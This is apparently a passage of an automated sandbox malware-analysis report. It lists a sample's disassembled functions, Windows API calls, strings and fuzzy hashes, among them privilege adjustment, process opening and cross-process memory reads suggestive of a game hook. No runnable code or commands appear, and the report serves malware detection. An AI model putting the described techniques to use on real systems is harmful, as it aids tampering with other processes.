                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileHandle_memset$Close$AddressCreateModuleProcReadSize_malloc
                                                                                  • String ID: A3M2
                                                                                  • API String ID: 2428753672-2848054085
                                                                                  • Opcode ID: e52001c22ad91db7f356dbc8529486a7c512b67f6af2d9a43c42bf236b25ac49
                                                                                  • Instruction ID: 331287e3c73e0cc68bb59dea44cbcdd8a865135a07cabc8c3b5c59df7e9d40fe
                                                                                  • Opcode Fuzzy Hash: e52001c22ad91db7f356dbc8529486a7c512b67f6af2d9a43c42bf236b25ac49
                                                                                  • Instruction Fuzzy Hash: AC317CB16043046BE610AB64DC8EFEB37DDAB45798F050434F919D61D2EF74990986A3
                                                                                  Function 0BE93238 Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0BE932C0
                                                                                  • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0BE932E4
                                                                                  • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0BE93300
                                                                                  • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 0BE93321
                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0BE9334A
                                                                                  • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 0BE93358
                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 0BE93393
                                                                                  • GetFileType.KERNEL32(?,000000F5), ref: 0BE933A9
                                                                                  • CloseHandle.KERNEL32(?,?,000000F5), ref: 0BE933C4
                                                                                  • GetLastError.KERNEL32(000000F5), ref: 0BE933DC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                  • String ID:
                                                                                  • API String ID: 1694776339-0
                                                                                  • Opcode ID: 9ab876b33e95a7d9fa5d29434460b8d33dada4bf2aa3fe7fe3f356c4207dd06d
                                                                                  • Instruction ID: ff37a39894772ebe23f28595c63a601a27c08699f6a60e025304e5a4c6296b35
                                                                                  • Opcode Fuzzy Hash: 9ab876b33e95a7d9fa5d29434460b8d33dada4bf2aa3fe7fe3f356c4207dd06d
                                                                                  • Instruction Fuzzy Hash: D641D230644701EAEF30EF24F80976676E5EB00B55F20AE29D4B6D75E0EA61A85C8749
                                                                                  Function 6A6D8670 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 215COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • _memset.LIBCMT ref: 6A6D86C5
                                                                                  • ReadProcessMemory.KERNEL32(00000000,00530000,?,00040000,?,?,00000000,0003FFFF,6A6DA314,?), ref: 6A6D86E8
                                                                                  • ReadProcessMemory.KERNEL32(00000000,005B0000,?,00040000,?), ref: 6A6D87D7
                                                                                  • ReadProcessMemory.KERNEL32(00000000,00510000,?,00040000,?), ref: 6A6D88C4
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D89A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$Process$ReadVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilege_memset
                                                                                  • String ID: 8$E$}
                                                                                  • API String ID: 1110381803-3509493567
                                                                                  • Opcode ID: 4bdc23592b5c6a724dcb95a148795c1c9ffa620f0cea615cc4a495ce547eaf1e
                                                                                  • Instruction ID: 359779cc469a048a5d418ae401a3814bbf4f73f98f34c0777566d39d382167fc
                                                                                  • Opcode Fuzzy Hash: 4bdc23592b5c6a724dcb95a148795c1c9ffa620f0cea615cc4a495ce547eaf1e
                                                                                  • Instruction Fuzzy Hash: BAA1C52104D3C199D362D63D489878FBED15FFB258F881B8DF1E4572E2C6658609C36B
                                                                                  Function 6A6DDD80 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 97filetimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(00000000,00000000), ref: 6A6DDE01
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 6A6DDE07
                                                                                  • _sprintf.LIBCMT ref: 6A6DDE30
                                                                                    • Part of subcall function 6A6D50B0: _memset.LIBCMT ref: 6A6D50E5
                                                                                    • Part of subcall function 6A6D50B0: _sprintf.LIBCMT ref: 6A6D50FB
                                                                                  • OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 6A6DDE51
                                                                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 6A6DDE78
                                                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 6A6DDE8A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Mapping_sprintf$CreateCurrentLocalOpenProcessTimeView_memset
                                                                                  • String ID: %d-{%d}-%d$TH_MAP_DATA
                                                                                  • API String ID: 626235581-1469962609
                                                                                  • Opcode ID: 88e5fb795214ba890898f144687dc9effea38c547c0fdd6175bde45deacb2df8
                                                                                  • Instruction ID: f95d43f7274b14d5877f20c920873c63004d632945e20758e5a9068aa35c7ad9
                                                                                  • Opcode Fuzzy Hash: 88e5fb795214ba890898f144687dc9effea38c547c0fdd6175bde45deacb2df8
                                                                                  • Instruction Fuzzy Hash: 0C31AAB16083409FC784DFA8C945B6BBBF5AF89700F44492EF189D3291EB70D908CB16
                                                                                  Function 6A6DDEC0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 63fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 6A6DDF1E
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DDF37
                                                                                  • OutputDebugStringA.KERNEL32(OpenFileMapping failed,75920F00,?,?,?,?,?,?,?,?,?,?,6A6DDFD5,?,00000000,?), ref: 6A6DDF51
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C,?,?,?,?,?,?,?,?,?,?,6A6DDFD5,?,00000000,?,?), ref: 6A6DDF58
                                                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,?,?,?,?,?,6A6DDFD5,?,00000000,?), ref: 6A6DDF83
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugFileOutputString$MappingOpenView__wfopen_s
                                                                                  • String ID: C:\pl.txt$OpenFileMapping failed$TH_MAP_DATA
                                                                                  • API String ID: 3806545002-2707373594
                                                                                  • Opcode ID: 9f1397f0d0b255593e0b47e2808abb8bd1133e77ab48a7ef58ec38c17bec2834
                                                                                  • Instruction ID: fd51e78db14b969e893d17f3957724880ad7be1d548ca7db70ae8498ee88a062
                                                                                  • Opcode Fuzzy Hash: 9f1397f0d0b255593e0b47e2808abb8bd1133e77ab48a7ef58ec38c17bec2834
                                                                                  • Instruction Fuzzy Hash: BC213EB1A08300AFC744DF65C942B5ABBE5AB8D604F45482EF589D7241EA70AE44DB87
                                                                                  Function 6A6D3D10 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 57libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll,?), ref: 6A6D3D19
                                                                                  • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 6A6D3D25
                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 6A6D3D62
                                                                                  • IsWow64Process.KERNEL32(00000000), ref: 6A6D3D69
                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 6A6D3D95
                                                                                  • IsWow64Process.KERNEL32(00000000), ref: 6A6D3D9C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentWow64$AddressLibraryLoadProc
                                                                                  • String ID: RtlGetNtVersionNumbers$ntdll.dll
                                                                                  • API String ID: 4086309646-1263206204
                                                                                  • Opcode ID: 69edd408c561eae8eb775671bb73f638b040f592f1fe2d6ecd7c11a73d561bc7
                                                                                  • Instruction ID: ba42c16d66c042171e9681691385bd9717300cadf8a1768c928fc5dea62e79a1
                                                                                  • Opcode Fuzzy Hash: 69edd408c561eae8eb775671bb73f638b040f592f1fe2d6ecd7c11a73d561bc7
                                                                                  • Instruction Fuzzy Hash: 73111FB1808311AFC700EFA5C94949BBBF8FE88651F888D1DF195D6110E738DA48CF96
                                                                                  Function 6A6F3D7A Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog3_catch.LIBCMT ref: 6A6F3D81
                                                                                  • EnterCriticalSection.KERNEL32(?,00000010,6A6F403D,?,00000000,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3D92
                                                                                  • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3DB0
                                                                                  • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3DE4
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3E50
                                                                                  • _memset.LIBCMT ref: 6A6F3E6F
                                                                                  • TlsSetValue.KERNEL32(?,00000000,?,?,?,?,?,?,00000001), ref: 6A6F3E80
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3EA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                  • String ID:
                                                                                  • API String ID: 1891723912-0
                                                                                  • Opcode ID: f648129742cd0c676c9654de65a1f00af17a4678f1ef9f799da97dcba1c63444
                                                                                  • Instruction ID: 39ec5ee8aed30066f4df55f4b247053e208035e02950f8a80d80b28e69ef4f70
                                                                                  • Opcode Fuzzy Hash: f648129742cd0c676c9654de65a1f00af17a4678f1ef9f799da97dcba1c63444
                                                                                  • Instruction Fuzzy Hash: 34319CB0500606EFDB209F50C889C5AFBF2FF05314B21C92AE926A7554CF35AD52CF95
                                                                                  Function 6A6D4C50 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 269COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D4EE7
                                                                                  • _sprintf.LIBCMT ref: 6A6D4F02
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D4F19
                                                                                  • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?,?,00000008,6A732B2C,00000002,75919350,?), ref: 6A6D4F32
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C,?,?,?,?,?,?,?,?,00000008,6A732B2C,00000002,75919350,?), ref: 6A6D4F39
                                                                                  Strings
                                                                                  • UnionZsShareDate nGameType is : %d hotkeyFlag is : %d, hookFlag : %d, xrefs: 6A6D4EFC
                                                                                  • C:\pl.txt, xrefs: 6A6D4F13
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_sprintf
                                                                                  • String ID: C:\pl.txt$UnionZsShareDate nGameType is : %d hotkeyFlag is : %d, hookFlag : %d
                                                                                  • API String ID: 970810673-172700874
                                                                                  • Opcode ID: 417b61721b46335a859616393155f456e87d6565d527039eb360f6ea4e044b5c
                                                                                  • Instruction ID: 7073590afb966db59fb9f9d03577f033df955d72516e2a67fec99f0cd4e4cc27
                                                                                  • Opcode Fuzzy Hash: 417b61721b46335a859616393155f456e87d6565d527039eb360f6ea4e044b5c
                                                                                  • Instruction Fuzzy Hash: 43A126B18047859BC730EFA9C598557BBE0AF06344B06CD2DE1EA47622EF70E940CB92
                                                                                  Function 0BE9FDC8 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetThreadLocale.KERNEL32(00000000,0BEA0093,?,?,00000000,00000000), ref: 0BE9FDFE
                                                                                    • Part of subcall function 0BE9E548: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0BE9E566
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
